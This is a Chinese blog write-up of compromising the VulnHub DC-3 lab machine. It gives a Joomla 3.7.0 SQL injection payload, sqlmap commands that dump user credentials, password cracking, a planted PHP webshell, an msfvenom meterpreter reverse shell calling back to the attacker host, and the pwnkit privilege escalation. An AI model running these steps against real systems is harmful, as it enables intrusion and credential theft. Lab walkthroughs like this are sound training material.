vulnhub dc-3渗透

1.扫描存活主机,发现存货主机192.168.85.174

nmap 192.168.85.0/24

在这里插入图片描述
2.扫描端口,发现只开放了80端口

nmap -p1-65535 192.168.85.174

在这里插入图片描述
3.扫描服务版本信息

nma -sV 192.168.85.174

在这里插入图片描述
4.访问网站,发现cms为joomla
在这里插入图片描述
网站中有一段提示,是这个靶机只有一个flag,也就是在root目录下的flag
5.在网络上搜索joomla相关漏洞
msf尝试各种exp失败了
通过扫描(auxiliary/scanner/http/joomla_version) 知道了版本是3.7.0
找到两个相关漏洞 反序列化 rce(CVE-2015-8562 ) sql注入(CVE-2017-8917)
尝试反序列化 rce失败
sql注入
payload:

index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,database()),1)

发现可以查出数据库
在这里插入图片描述
后面如果手工注入查字段会出现问题,因为有个表名’#__users’,使用单引号会出现报错,有转义符
使用sqlmap进行注入
查对应的表名

python sqlmap.py -u "http://192.168.85.174/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D joomladb --tables --batch

在这里插入图片描述
查#__users的字段

`python sqlmap.py -u "http://192.168.85.174/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D joomladb -T #__users --columns`

在这里插入图片描述
查数据

python sqlmap.py -u "http://192.168.85.174/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D joomladb -T #__users -C username,password --dump

在这里插入图片描述
6.使用john破解密码
把密码写入1.txt

vim 1.txt
john 1.txt

破解出密码是spoony

7.扫描目录,登录后台

dirb http://192.168.85.174/

扫出关键目录administrator目录
在这里插入图片描述

8.找对应的改源码地方
在下方位置可以修改源码
在这里插入图片描述
在这里插入图片描述
写入一句话木马,保存
蚁剑连接,上传msf木马
发现执行失败,可能是权限的问题
使用msf生成php的木马

 msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.85.129 lport=4444 -f raw  -o 1.php

把1.php的代码复制到网站源码中,保存,访问
监听

use multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 0.0.0.0.
run

成功收到会话
在这里插入图片描述
9.提权
上传漏洞探测脚本,发现cve-2021-4034
在这里插入图片描述
只要安装这个工具,就可能存在漏洞

 dpkg -l policykit-1    #查看是否安装了pwnkit

在这里插入图片描述
上传exp

make
./cve-2021-4034

成功提权
在这里插入图片描述
查看flag
在这里插入图片描述
参考文章:
joomla漏洞
dc-3渗透

posted @ 2024-04-27 12:56  mushangqiujin  阅读(0)  评论(0编辑  收藏  举报  来源